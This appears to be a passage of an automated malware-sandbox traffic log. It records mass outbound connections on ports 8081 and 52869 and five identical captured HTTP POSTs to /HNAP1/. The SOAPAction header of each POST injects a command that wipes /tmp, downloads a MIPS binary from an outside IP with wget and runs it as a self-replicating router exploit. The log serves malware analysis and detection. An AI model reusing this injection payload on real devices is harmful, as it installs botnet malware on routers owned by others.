                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 32.15.152.55:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 76.241.160.168:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 97.142.234.10:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 65.175.63.79:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 45.52.128.26:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 4.127.149.162:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 53.52.96.77:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 67.22.63.20:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 193.231.151.213:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 150.142.204.76:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 52.111.227.131:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 183.81.8.123:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 207.176.141.239:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 144.67.101.164:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 180.71.217.116:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 146.122.77.34:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 206.255.21.173:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 164.133.1.12:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 138.165.132.246:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 213.128.249.241:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 9.117.1.5:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 202.74.203.145:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 80.191.168.210:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 189.155.101.93:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 94.214.213.111:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 116.248.33.123:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 131.6.22.103:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 156.181.89.15:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 19.213.98.51:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 24.156.44.13:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 68.125.207.161:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 185.136.232.14:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 204.124.37.61:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 35.107.165.163:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 70.244.8.125:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 61.242.2.190:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 4.128.18.72:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 181.82.121.242:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 37.81.252.236:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 47.16.138.161:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 35.180.11.212:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 220.213.31.136:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 156.99.198.179:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 131.8.95.253:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 189.83.214.163:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 219.10.127.45:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 216.35.193.176:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 185.132.48.201:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 210.81.215.69:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 114.100.155.82:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 47.224.158.58:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 223.143.35.254:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 72.4.129.143:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 223.242.153.190:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 143.68.201.77:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 77.5.89.22:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 140.35.228.133:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 27.211.226.74:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 73.102.60.211:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 96.45.55.234:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 36.159.217.125:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 97.50.115.200:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 27.247.163.222:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 134.230.130.185:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 145.229.168.132:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 51.156.205.139:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 176.224.174.174:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 68.251.134.43:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 157.223.126.25:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 148.2.12.125:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 52.136.210.121:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 184.192.255.233:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 1.200.111.50:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 98.74.12.225:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 125.66.54.149:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 187.189.79.198:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 174.38.108.83:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 159.94.41.117:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 13.122.59.167:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 133.8.172.164:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 57.131.227.3:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 51.192.83.103:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 74.170.109.218:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 62.5.163.114:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 157.104.97.161:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 204.66.149.99:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 148.30.198.131:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 142.219.250.29:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 125.97.107.120:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 187.140.68.61:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 120.181.185.117:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 103.132.88.33:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 137.134.252.4:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 64.104.54.14:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 190.231.104.96:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 154.57.81.200:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 162.190.144.241:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 96.209.69.20:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 41.109.181.54:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 121.248.9.74:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 117.129.252.99:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 150.186.198.246:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 183.106.204.162:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 183.59.191.208:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 188.199.48.64:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 24.245.120.74:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 113.211.98.23:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 75.120.116.239:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 189.230.165.186:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 153.104.11.80:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 19.97.179.204:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 101.86.111.6:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 40.31.56.204:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 181.62.64.51:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 149.79.37.237:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 154.64.178.0:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 51.84.22.246:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 64.61.239.79:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 185.138.94.75:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 70.251.155.61:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 179.192.77.243:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 81.143.140.223:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 59.10.142.189:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 4.162.121.105:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 210.29.223.179:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 184.126.92.19:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 216.17.47.144:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 153.126.184.30:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 20.226.134.71:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 59.35.79.156:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 205.35.169.26:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 200.51.205.131:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 132.253.188.42:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 134.214.175.73:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 200.98.155.108:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 83.71.51.102:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 175.80.113.227:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 52.248.88.164:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 90.248.254.246:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 211.173.154.125:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 19.45.76.169:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 89.113.83.91:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 45.129.181.164:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 36.216.251.126:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 81.167.63.48:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 193.109.205.113:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 131.84.155.33:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 36.164.151.170:52869
                      Source: global trafficTCP traffic: 192.168.2.14:26966 -> 95.188.72.113:52869
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
